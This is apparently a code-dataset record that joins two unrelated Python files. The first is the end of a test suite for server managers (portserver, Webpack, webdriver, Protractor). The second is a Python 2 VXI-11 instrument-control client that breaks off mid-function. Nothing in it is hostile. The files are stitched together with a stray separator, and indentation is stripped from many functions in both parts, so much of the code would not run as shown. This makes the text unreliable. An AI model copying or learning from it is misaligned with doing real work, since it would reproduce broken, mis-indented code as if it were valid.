        'python -m scripts.run_portserver '
        '--portserver_unix_socket_address %s' % (
            common.PORTSERVER_SOCKET_FILEPATH),
    )
    self.assertEqual(proc.signals_received, [signal.SIGINT])
    self.assertEqual(mock_os_remove.times_called, 1)
def test_managed_portserver_when_signals_are_rejected(self):
    """When the portserver ignores SIGINT, shutdown escalates to
    terminate(), but not all the way to kill().
    """
    popen_calls = self.exit_stack.enter_context(self.swap_popen())

    proc = self.exit_stack.enter_context(servers.managed_portserver())
    # Simulate a process that refuses to act on the signal it receives.
    proc.reject_signal = True
    self.exit_stack.close()

    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
        'python -m scripts.run_portserver '
        '--portserver_unix_socket_address %s' % (
            common.PORTSERVER_SOCKET_FILEPATH),
    )
    # SIGINT was delivered but rejected, so terminate() was needed;
    # the process then exited, so kill() was not.
    self.assertEqual(proc.signals_received, [signal.SIGINT])
    self.assertEqual(proc.terminate_count, 1)
    self.assertEqual(proc.kill_count, 0)
def test_managed_portserver_when_unresponsive(self):
    """When the portserver ignores both SIGINT and terminate(), shutdown
    escalates all the way to kill().
    """
    popen_calls = self.exit_stack.enter_context(self.swap_popen())

    proc = self.exit_stack.enter_context(servers.managed_portserver())
    # Simulate a hung process that responds to nothing short of kill().
    proc.unresponsive = True
    self.exit_stack.close()

    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
        'python -m scripts.run_portserver '
        '--portserver_unix_socket_address %s' % (
            common.PORTSERVER_SOCKET_FILEPATH),
    )
    # Full escalation chain: SIGINT -> terminate() -> kill().
    self.assertEqual(proc.signals_received, [signal.SIGINT])
    self.assertEqual(proc.terminate_count, 1)
    self.assertEqual(proc.kill_count, 1)
def test_managed_webpack_compiler_in_watch_mode_when_build_succeeds(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'abc', b'Built at: 123', b'def']))
str_io = python_utils.string_io()
self.exit_stack.enter_context(contextlib.redirect_stdout(str_io))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_webpack_compiler(
watch_mode=True))
self.exit_stack.close()
self.assert_proc_was_managed_as_expected(logs, proc.pid)
self.assertEqual(len(popen_calls), 1)
self.assertIn('--color', popen_calls[0].program_args)
self.assertIn('--watch', popen_calls[0].program_args)
self.assertIn('--progress', popen_calls[0].program_args)
self.assert_matches_regexps(str_io.getvalue().strip().split('\n'), [
'Starting new Webpack Compiler',
'abc',
'Built at: 123',
'def',
'Stopping Webpack Compiler',
])
def test_managed_webpack_compiler_in_watch_mode_raises_when_not_built(self):
# NOTE: The 'Built at: ' message is never printed.
self.exit_stack.enter_context(self.swap_popen(outputs=[b'abc', b'def']))
str_io = python_utils.string_io()
self.exit_stack.enter_context(contextlib.redirect_stdout(str_io))
self.assertRaisesRegexp(
IOError, 'First build never completed',
lambda: self.exit_stack.enter_context(
servers.managed_webpack_compiler(watch_mode=True)))
self.assert_matches_regexps(str_io.getvalue().strip().split('\n'), [
'Starting new Webpack Compiler',
'abc',
'def',
'Stopping Webpack Compiler',
])
def test_managed_webpack_compiler_uses_explicit_config_path(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
config_path='config.json'))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config config.json' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH))
def test_managed_webpack_compiler_uses_prod_source_maps_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=True, use_source_maps=True))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_PROD_SOURCE_MAPS_CONFIG))
def test_managed_webpack_compiler_uses_prod_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=True, use_source_maps=False))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_PROD_CONFIG))
def test_managed_webpack_compiler_uses_dev_source_maps_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=False, use_source_maps=True))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_DEV_SOURCE_MAPS_CONFIG))
def test_managed_webpack_compiler_uses_dev_config(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
use_prod_env=False, use_source_maps=False))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s --config %s' % (
common.NODE_BIN_PATH, common.WEBPACK_BIN_PATH,
common.WEBPACK_DEV_CONFIG))
def test_managed_webpack_compiler_with_max_old_space_size(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen(
outputs=[b'Built at: 123']))
self.exit_stack.enter_context(servers.managed_webpack_compiler(
max_old_space_size=2056))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertIn('--max-old-space-size=2056', popen_calls[0].program_args)
def test_managed_webdriver_with_explicit_chrome_version(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_call', lambda _: None, expected_args=[
(
[common.NODE_BIN_PATH,
common.WEBDRIVER_MANAGER_BIN_PATH, 'update',
'--versions.chrome', '123'],
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(
servers.managed_webdriver_server(chrome_version='123'))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 123 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_on_mac_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Darwin'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_output', lambda _: b'4.5.6.78', expected_args=[
(
['/Applications/Google Chrome.app/Contents/MacOS'
'/Google Chrome',
'--version'],
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
python_utils,
'url_open',
lambda _: mock.Mock(read=lambda: b'4.5.6'),
expected_args=[
(
'https://chromedriver.storage.googleapis.com'
'/LATEST_RELEASE_4.5.6',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 4.5.6 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_on_non_mac_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_with_checks(
subprocess, 'check_output', lambda _: b'1.2.3.45', expected_args=[
(['google-chrome', '--version'],),
]))
self.exit_stack.enter_context(self.swap_with_checks(
python_utils, 'url_open',
lambda _: mock.Mock(read=lambda: b'1.2.3'),
expected_args=[
(
'https://chromedriver.storage.googleapis.com'
'/LATEST_RELEASE_1.2.3',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 1.2.3 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_webdriver_fails_to_get_chrome_version(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
self.exit_stack.enter_context(self.swap_to_always_raise(
subprocess, 'check_output', error=OSError))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None, called=False))
expected_regexp = 'Failed to execute "google-chrome --version" command'
with self.assertRaisesRegexp(Exception, expected_regexp):
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.assertEqual(len(popen_calls), 0)
def test_managed_webdriver_on_window_os(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Windows'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_call'))
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'check_output', value=b'1.2.3.45'))
self.exit_stack.enter_context(self.swap_to_always_return(
python_utils, 'url_open', value=mock.Mock(read=lambda: b'1.2.3')))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'is_x64_architecture', value=True))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'inplace_replace_file_context',
lambda *_: contextlib.nullcontext(), expected_args=[
(
common.CHROME_PROVIDER_FILE_PATH,
re.escape('this.osArch = os.arch();'),
'this.osArch = "x64";',
),
(
common.GECKO_PROVIDER_FILE_PATH,
re.escape('this.osArch = os.arch();'),
'this.osArch = "x64";',
),
]))
self.exit_stack.enter_context(self.swap_with_checks(
common, 'wait_for_port_to_be_in_use', lambda _: None,
expected_args=[(4444,)]))
self.exit_stack.enter_context(servers.managed_webdriver_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(
popen_calls[0].program_args,
'%s %s start --versions.chrome 1.2.3 --quiet --standalone' % (
common.NODE_BIN_PATH, common.WEBDRIVER_MANAGER_BIN_PATH))
def test_managed_protractor_with_invalid_sharding_instances(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
with self.assertRaisesRegexp(ValueError, 'should be larger than 0'):
self.exit_stack.enter_context(
servers.managed_protractor_server(sharding_instances=0))
with self.assertRaisesRegexp(ValueError, 'should be larger than 0'):
self.exit_stack.enter_context(
servers.managed_protractor_server(sharding_instances=-1))
self.exit_stack.close()
self.assertEqual(len(popen_calls), 0)
def test_managed_protractor(self):
popen_calls = self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(servers.managed_protractor_server())
self.exit_stack.close()
self.assertEqual(len(popen_calls), 1)
self.assertEqual(popen_calls[0].kwargs, {'shell': True})
program_args = popen_calls[0].program_args
self.assertIn(
'%s --unhandled-rejections=strict %s %s' % (
common.NODE_BIN_PATH, common.PROTRACTOR_BIN_PATH,
common.PROTRACTOR_CONFIG_FILE_PATH),
program_args)
self.assertNotIn('--inspect-brk', program_args)
self.assertIn('--params.devMode=True', program_args)
self.assertIn('--suite full', program_args)
def test_managed_protractor_with_explicit_args(self):
    """Checks the Protractor command line built from non-default args."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())

    self.exit_stack.enter_context(servers.managed_protractor_server(
        suite_name='abc', sharding_instances=3, debug_mode=True,
        dev_mode=False, stdout=subprocess.PIPE))
    self.exit_stack.close()

    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].kwargs, {'shell': True, 'stdout': subprocess.PIPE})
    program_args = popen_calls[0].program_args
    # From debug_mode=True.
    self.assertIn('--inspect-brk', program_args)
    # From sharding_instances=3.
    self.assertIn('--capabilities.shardTestFiles=True', program_args)
    self.assertIn('--capabilities.maxInstances=3', program_args)
    # From dev_mode=False.
    self.assertIn('--params.devMode=False', program_args)
    # From suite_name='abc'.
    self.assertIn('--suite abc', program_args)
|
vxi_11.py | "The basic infrastructure for maintaining a vxi-11 protocol connection to a remote device"
_rcsid="vxi_11.py,v 1.6 2003/05/30 13:29:23 mendenhall Release-20050805"
import rpc
from rpc import TCPClient, RawTCPClient
import exceptions
import struct
import traceback
import time
import weakref
import sys
import select
try:
import threading
threads=1
except:
threads=0
connection_dict={}
def close_all_connections():
    "disconnect and close out all vxi_11 connections created here, even if their object references have been lost"
    # connection_dict maps VXI-11 link ids to (device_name, weakref) pairs.
    # NOTE: in Python 2 (which this module targets), .keys() returns a list
    # snapshot, so deleting entries while iterating is safe here.
    for wobj in connection_dict.keys():
        name, wconn=connection_dict[wobj]
        conn=wconn() #dereference weak ref
        if conn is not None:
            try:
                conn.disconnect()
            except:
                # best-effort cleanup: log and keep closing the others
                conn.log_exception("***vxi_11.close_all_connections exception: ")
        else:
            # weakref died without disconnect() removing the entry
            del connection_dict[wobj] #how did this happen?
class Junk_OneWayAbortClient(RawTCPClient):
    """OneWayAbortClient allows one to handle the strange, one-way abort rpc from an Agilent E5810.
    Really, it doesn't even do a one-way transmission... it loses aborts, so this is history """
    def do_call(self):
        # Send the RPC request without waiting for a reply, then feed the
        # unpacker a dummy zero word so callers still see a valid result.
        call = self.packer.get_buf()
        rpc.sendrecord(self.sock, call)
        self.unpacker.reset('\0\0\0\0') #put a valid return value into the unpacker
class VXI_11_Error(IOError):
    """Base exception for VXI-11 protocol errors.

    Wraps a numeric error code from the VXI-11 specification (or one of a
    few module-local string pseudo-codes) plus optional diagnostic context.
    """
    # Integer keys are codes defined by the VXI-11 specification; string
    # keys are local pseudo-codes for transport-level problems.
    vxi_11_errors={
        0:"No error", 1:"Syntax error", 3:"Device not accessible",
        4:"Invalid link identifier", 5:"Parameter error", 6:"Channel not established",
        8:"Operation not supported", 9:"Out of resources", 11:"Device locked by another link",
        12:"No lock held by this link", 15:"IO Timeout", 17:"IO Error", 21:"Invalid Address",
        23:"Abort", 29:"Channel already established" ,
        "eof": "Cut off packet received in rpc.recvfrag()",
        "sync":"stream sync lost",
        "notconnected": "Device not connected"}

    def identify_vxi_11_error(self, error):
        # Render "<code>: <description>". NOTE: dict.has_key() and the
        # backtick repr syntax are Python 2 only, consistent with the rest
        # of this module.
        if self.vxi_11_errors.has_key(error):
            return `error`+": "+self.vxi_11_errors[error]
        else:
            return `error`+": Unknown error code"

    def __init__(self, code, **other_info):
        self.code=code  # raw code, int per spec or local string pseudo-code
        self.message=self.identify_vxi_11_error(code)
        self.other_info=other_info  # extra diagnostic context, shown in repr

    def __repr__(self):
        if self.other_info:
            return self.message+": "+str(self.other_info)
        else:
            return self.message

    def __str__(self):
        return self.__repr__()
class VXI_11_Device_Not_Connected(VXI_11_Error):
def __init__(self):
VXI_11_Error.__init__(self,'notconnected')
class VXI_11_Device_Not_Locked(VXI_11_Error):
pass
class VXI_11_Transient_Error(VXI_11_Error): #exceptions having to do with multiple use which might get better
pass
class VXI_11_Timeout(VXI_11_Transient_Error):
pass
class VXI_11_Locked_Elsewhere(VXI_11_Transient_Error):
pass
class VXI_11_Stream_Sync_Lost(VXI_11_Transient_Error):
def __init__(self, code, bytes):
VXI_11_Transient_Error.__init__(self, code)
self.other_info="bytes vacuumed = %d" % bytes
class VXI_11_RPC_EOF(VXI_11_Transient_Error):
pass
_VXI_11_enumerated_exceptions={ #common, correctable exceptions
15:VXI_11_Timeout,
11:VXI_11_Locked_Elsewhere,
12:VXI_11_Device_Not_Locked
}
class vxi_11_connection:
"""vxi_11_connection implements handling of devices compliant with vxi11.1-vxi11.3 protocols, with which
the user should have some familiarity"""
debug_info=0
debug_error=1
debug_warning=2
debug_all=3
debug_level=debug_error
OneWayAbort=0 #by default, this class uses two-way aborts, per official vxi-11 standard
def _list_packer(self, args):
l=map(None, self.pack_type_list, args) # combine lists
for packer, data in l:
packer(data)
def _list_unpacker(self):
return [func() for func in self.unpack_type_list]
def _link_xdr_defs(self, channel):
"self.link_xdr_defs() creates dictionaries of functions for packing and unpacking the various data types"
p=channel.packer
u=channel.unpacker
xdr_packer_defs={
"write": (p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_opaque),
"read": (p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_int, p.pack_int),
"create_link": (p.pack_int, p.pack_bool, p.pack_uint, p.pack_string),
"generic": (p.pack_int, p.pack_int, p.pack_int, p.pack_int),
"lock": (p.pack_int, p.pack_int, p.pack_int),
"id": (p.pack_int,)
}
xdr_unpacker_defs={
"write": (u.unpack_int, u.unpack_int),
"read": (u.unpack_int, u.unpack_int, u.unpack_opaque),
"create_link": (u.unpack_int, u.unpack_int, u.unpack_uint, u.unpack_uint),
"read_stb":(u.unpack_int, u.unpack_int),
"error": (u.unpack_int,)
}
return xdr_packer_defs, xdr_unpacker_defs
def _setup_core_packing(self, pack, unpack):
self.pack_type_list, self.unpack_type_list=self._core_packers[pack],self._core_unpackers[unpack]
def post_init(self):
pass
def simple_log_error(self, message, level=debug_error, file=None):
if level <= self.debug_level:
if file is None:
file=sys.stderr
print >> file, self.device_name, message
def fancy_log_error(self, message, level=debug_error, file=None):
if level <= self.debug_level:
message=str(message).strip()
level_str=("**INFO*****", "**ERROR****", "**WARNING**", "**DEBUG****")[level]
if file is None:
file=sys.stderr
print >> file, time.asctime().strip(), '\t', level_str, '\t', self.shortname, '\t', \
message.replace('\n','\n\t** ').replace('\r','\n\t** ')
def log_error(self, message, level=debug_error, file=None):
"override log_error() for sending messages to special places or formatting differently"
self.fancy_log_error(message, level, file)
def log_traceback(self, main_message='', file=None):
exlist=traceback.format_exception(*sys.exc_info())
s=main_message+'\n'
for i in exlist:
s=s+i
self.log_error(s, self.debug_error, file)
def log_info(self, message, file=None):
self.log_error(message, self.debug_info, file)
def log_warning(self, message, file=None):
self.log_error(message, self.debug_warning, file)
def log_debug(self, message, file=None):
self.log_error(message, self.debug_all, file)
def log_exception(self, main_message='', file=None):
self.log_error(main_message+traceback.format_exception_only(*(sys.exc_info()[:2]))[0], self.debug_error, file)
def __init__(self, host='127.0.0.1', device="inst0", timeout=1000, raise_on_err=None, device_name="Network Device", shortname=None,
portmap_proxy_host=None, portmap_proxy_port=rpc.PMAP_PORT):
self.raise_on_err=raise_on_err
self.lid=None
self.timeout=timeout
self.device_name=device_name
self.device_sicl_name=device
self.host=host
self.portmap_proxy_host=portmap_proxy_host
self.portmap_proxy_port=portmap_proxy_port
self.core=None
self.abortChannel=None
self.mux=None #default is no multiplexer active
if shortname is None:
self.shortname=device_name.strip().replace(' ','').replace('\t','')
else:
self.shortname=shortname.strip().replace(' ','').replace('\t','')
if threads:
self.threadlock=threading.RLock()
try:
self.reconnect()
except VXI_11_Transient_Error:
self.log_exception("Initial connect failed... retry later")
def setup_mux(self, mux=None, global_name=None):
self.mux=mux
self.global_mux_name=global_name
def command(self, id, pack, unpack, arglist, ignore_connect=0):
if not (ignore_connect or self.connected):
raise VXI_11_Device_Not_Connected
self._setup_core_packing(pack, unpack)
try:
result= self.core.make_call(id, arglist, self._list_packer, self._list_unpacker)
except (RuntimeError, EOFError):
#RuntimeError is thrown by recvfrag if the xid is off... it means we lost data in the pipe
#EOFError is thrown if the packet isn't full length, as usually happens when ther is garbage in the pipe read as a length
#so vacuum out the socket, and raise a transient error
rlist=1
ntotal=0
while(rlist):
rlist, wlist, xlist=select.select([self.core.sock],[],[], 1.0)
if rlist:
ntotal+=len(self.core.sock.recv(10000) )#get some data from it
raise VXI_11_Stream_Sync_Lost("sync", ntotal)
err=result[0]
if err and self.raise_on_err:
e=_VXI_11_enumerated_exceptions #common, correctable exceptions
if e.has_key(err):
raise e[err](err) #raise these exceptions explicitly
else:
raise VXI_11_Error(err) #raise generic VXI_11 exception
return result
def do_timeouts(self, timeout, lock_timeout, channel=None):
if channel is None:
channel=self.core
flags=0
if timeout is None:
timeout=self.timeout
if not lock_timeout and hasattr(self,"default_lock_timeout"):
lock_timeout=self.default_lock_timeout
if lock_timeout:
flags |= 1 # append waitlock bit
if channel:
channel.select_timeout_seconds=1.5*max(timeout, lock_timeout)/1000.0 #convert ms to sec, and be generous on hard timeout
return flags, timeout, lock_timeout
def reconnect(self): #recreate a broken connection
    """reconnect() creates or recreates our main connection. Useful in __init__ and in complete communications breakdowns.
    If it throws a VXI_11_Transient_Error, the connection exists, but the check_idn() handshake or post_init() failed."""
    self.connected=0
    if self.core:
        self.core.close() #if this is a reconnect, break old connection the hard way
    # BUG FIX: the abort channel is stored in self.abort_channel (assigned
    # below), but the old code only checked self.abortChannel, which is set
    # to None in __init__ and never rebound -- so a previous abort channel
    # was never closed and its socket leaked on every reconnect. Close both
    # spellings; getattr() copes with disconnect() having del'd the attr.
    if self.abortChannel:
        self.abortChannel.close()
    if getattr(self, 'abort_channel', None):
        self.abort_channel.close()
    # program 395183 = VXI-11 core channel; version 1
    self.core=rpc.TCPClient(self.host, 395183, 1,
        portmap_proxy_host=self.portmap_proxy_host,
        portmap_proxy_port=self.portmap_proxy_port)
    self._core_packers, self._core_unpackers=self._link_xdr_defs(self.core) #construct xdr data type definitions for the core
    err, self.lid, self.abortPort, self.maxRecvSize=self.command(
        10, "create_link","create_link", (0, 0, self.timeout, self.device_sicl_name), ignore_connect=1) #execute create_link
    if err: #at this stage, we always raise exceptions since there isn't any way to bail out or retry reasonably
        raise VXI_11_Error(err)
    self.maxRecvSize=min(self.maxRecvSize, 1048576) #never transfer more than 1MB at a shot
    # program 395184 = VXI-11 abort channel, on the port create_link returned
    if self.OneWayAbort:
        #self.abort_channel=OneWayAbortClient(self.host, 395184, 1, self.abortPort)
        self.abort_channel=rpc.RawUDPClient(self.host, 395184, 1, self.abortPort)
    else:
        self.abort_channel=RawTCPClient(self.host, 395184, 1, self.abortPort)
    # register so close_all_connections() can find us even if the caller
    # loses its reference (weakref avoids keeping us alive)
    connection_dict[self.lid]=(self.device_name, weakref.ref(self))
    self.locklevel=0
    self.connected=1
    self.check_idn()
    self.post_init()
def abort(self):
self.abort_channel.select_timeout_seconds=self.timeout/1000.0 #convert to seconds
try:
err=self.abort_channel.make_call(1, self.lid, self.abort_channel.packer.pack_int, self.abort_channel.unpacker.unpack_int) #abort
except EOFError:
raise VXI_11_RPC_EOF("eof")
if err and self.raise_on_err:
raise VXI_11_Error( err)
return err
def disconnect(self):
    """Destroy the VXI-11 link and close both RPC channels.

    Safe to call when already disconnected (no-op then). Errors from
    destroy_link are logged and the sockets are closed regardless.
    """
    if self.connected:
        try:
            err, =self.command(23, "id", "error", (self.lid,)) #execute destroy_link
        except:
            self.log_traceback() #if we can't close nicely, we'll close anyway
        self.connected=0
        del connection_dict[self.lid]
        self.lid=None
        self.core.close()
        self.abort_channel.close()
        # BUG FIX: the original did `del self.core, self.abort_channel` and
        # then only rebound self.core/self.abortChannel, leaving
        # self.abort_channel unbound -- any later attribute access (e.g.
        # from abort() or __del__) raised AttributeError instead of a clean
        # not-connected error. Rebind everything to None instead.
        self.core=None
        self.abort_channel=None
        self.abortChannel=None
def __del__(self):
if self.lid is not None:
self.raise_on_err=0 #no exceptions here from simple errors
try:
self.abort()
except VXI_11_Error:
pass
try:
self.disconnect()
except VXI_11_Error:
pass
def write(self, data, timeout=None, lock_timeout=0):
"""err, bytes_sent=write(data [, timeout] [,lock_timeout]) sends data to device. See do_timeouts() for
semantics of timeout and lock_timeout"""
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
base=0
end=len(data)
while base<end:
n=end-base
if n>self.maxRecvSize:
xfer=self.maxRecvSize
else:
xfer=n
flags |= 8 #write end on last byte
err, count=self.command(11, "write", "write", (self.lid, timeout, lock_timeout, flags, data[base:base+xfer]))
if err: break
base+=count
return err, base
def read(self, timeout=None, lock_timeout=0, count=None, termChar=None):
    """err, reason, result=read([timeout] [,lock_timeout] [,count] [,termChar]) reads up to count bytes from the device,
    ending on count, EOI or termChar (if specified). See do_timeouts() for semantics of the timeouts."""
    flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
    if termChar is not None:
        flags |= 128 # set termchrset bit so the device honors act_term
        act_term=termChar
    else:
        act_term=0
    accumdata=""
    reason=0
    err=0
    accumlen=0
    # Loop until an error, the device signals END (reason bit 4), the
    # requested count is reached, or the terminator character arrives.
    # BUG FIX: the original condition indexed accumdata[-1] before any
    # data had been read, so supplying termChar always raised IndexError
    # on the first pass; guard the test with `not accumdata`.
    while ( (not err) and (not (reason & 4) ) and
            ( (count is None) or (accumlen < count)) and
            ( (termChar is None) or (not accumdata) or (accumdata[-1] != termChar)) ):
        readcount=self.maxRecvSize/2 #be conservative: ask for at most half the link's max transfer
        if count is not None:
            readcount=min(readcount, count-accumlen)
        err, reason, data = self.command(12, "read","read", (self.lid, readcount, timeout, lock_timeout, flags, act_term))
        accumdata+=data
        accumlen+=len(data)
        #print err, reason, len(data), len(accumdata)
    return err, reason, accumdata
def generic(self, code, timeout, lock_timeout):
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
err, = self.command(code, "generic", "error", (self.lid, flags, timeout, lock_timeout))
return err
def trigger(self, timeout=None, lock_timeout=0):
return self.generic(14, timeout, lock_timeout)
def clear(self, timeout=None, lock_timeout=0):
return self.generic(15, timeout, lock_timeout)
def remote(self, timeout=None, lock_timeout=0):
return self.generic(16, timeout, lock_timeout)
def local(self, timeout=None, lock_timeout=0):
return self.generic(17, timeout, lock_timeout)
def read_status_byte(self, timeout=None, lock_timeout=0):
flags, timeout, lock_timeout=self.do_timeouts(timeout, lock_timeout)
err, status = self.command(13, "generic","read_stb", (self.lid, flags, timeout, lock_timeout))
return err, status
def lock(self, lock_timeout=0):
"lock() acquires a lock on a device and the threadlock. If it fails it leaves the connection cleanly unlocked"
err=0
if threads:
self.threadlock.acquire()
if self.locklevel==0:
flags, timeout, lock_timeout=self.do_timeouts(0, lock_timeout)
try:
if self.mux: self.mux.lock_connection(self.global_mux_name)
try:
err, = self.command(18, "lock","error", (self.lid, flags, lock_timeout))
except:
if self.mux: self.mux.unlock_connection(self.global_mux_name)
raise
except:
if threads:
self.threadlock.release()
raise
if err:
if threads:
self.threadlock.release()
else:
self.locklevel+=1
return err
def is_locked(self):
return self.locklevel > 0
def unlock(self, priority=0):
"""unlock(priority=0) unwinds one level of locking, and if the level is zero, really unlocks the device.
Calls to lock() and unlock() should be matched. If there is a danger that they are not, due to bad
exception handling, unlock_completely() should be used as a final cleanup for a series of operations.
Setting priority to non-zero will bias the apparent last-used time in a multiplexer (if one is used),
so setting priority to -10 will effectively mark this channel least-recently-used, while setting it to
+2 will post-date the last-used time 2 seconds, so for the next 2 seconds, the device will be hard to kick
out of the channel cache (but not impossible).
"""
self.locklevel-=1
assert self.locklevel>=0, "Too many unlocks on device: "+self.device_name
err=0
try:
if self.locklevel==0:
try:
err, = self.command(19, "id", "error", (self.lid, ))
finally:
if self.mux:
self.mux.unlock_connection(self.global_mux_name, priority) #this cannot fail, no try needed (??)
elif priority and self.mux:
#even on a non-final unlock, a request for changed priority is always remembered
self.mux.adjust_priority(self.global_mux_name, priority)
finally:
if threads:
self.threadlock.release()
return err
def unlock_completely(self, priority=0):
    "unlock_completely() forces an unwind of any locks all the way back to zero for error cleanup. Only exceptions thrown are fatal."
    if threads:
        self.threadlock.acquire() #make sure we have the threadlock before we try a (possibly failing) full lock
    try:
        self.lock() #just to be safe, we should already hold one level of lock!
    except VXI_11_Locked_Elsewhere:
        pass #this is often called on error cleanup when we don't already have a lock, and we don't really care if we can't get it
    except VXI_11_Error:
        self.log_exception("Unexpected trouble locking in unlock_completely(): ")
    if threads:
        # HACK: force the RLock recursion counter to exactly 1 by poking the
        # name-mangled private attribute _RLock__count. This depends on a
        # CPython threading.RLock implementation detail; the arithmetic form
        # is chosen so it fails loudly (AttributeError) if that internal
        # attribute ever disappears.
        self.threadlock._RLock__count += (1-self.threadlock._RLock__count)
        #unwind to single lock the fast way, and make sure this variable really existed, to shield against internal changes
    self.locklevel=1 #unwind our own counter, too
    try:
        self.unlock(priority)
    except VXI_11_Device_Not_Locked:
        pass #if we couldn't lock above, we will probably get another exception here, and don't care
    except VXI_11_Transient_Error:
        self.log_exception("Unexpected trouble unlocking in unlock_completely(): ")
    except VXI_11_Error:
        # non-transient errors are logged AND re-raised; these are fatal
        self.log_exception("Unexpected trouble unlocking in unlock_completely(): ")
        raise
def transaction(self, data, count=None, lock_timeout=0):
    """err, reason, result=transaction(data, [, count] [,lock_timeout]) sends data and waits for a response.

    The lock level is guaranteed to be back at its entry value on return
    (barring a KeyboardInterrupt mid-flight). With no count, the read
    accepts an unlimited amount of data. See do_timeouts() for the
    meaning of lock_timeout.
    """
    self.lock(lock_timeout)
    reason, result = None, None
    try:
        err, _written = self.write(data)
        if not err:
            err, reason, result = self.read(count=count)
    finally:
        # always release, even if write()/read() raised
        self.unlock()
    return err, reason, result
def check_idn(self):
'check_idn() executes "*idn?" and aborts if the result does not start with self.idn_head'
if hasattr(self,"idn"):
return #already done
if hasattr(self,"idn_head") and self.idn_head is not None:
self.lock()
try:
self.clear()
err, reason, idn = self.transaction("*idn?")
finally:
self.unlock()
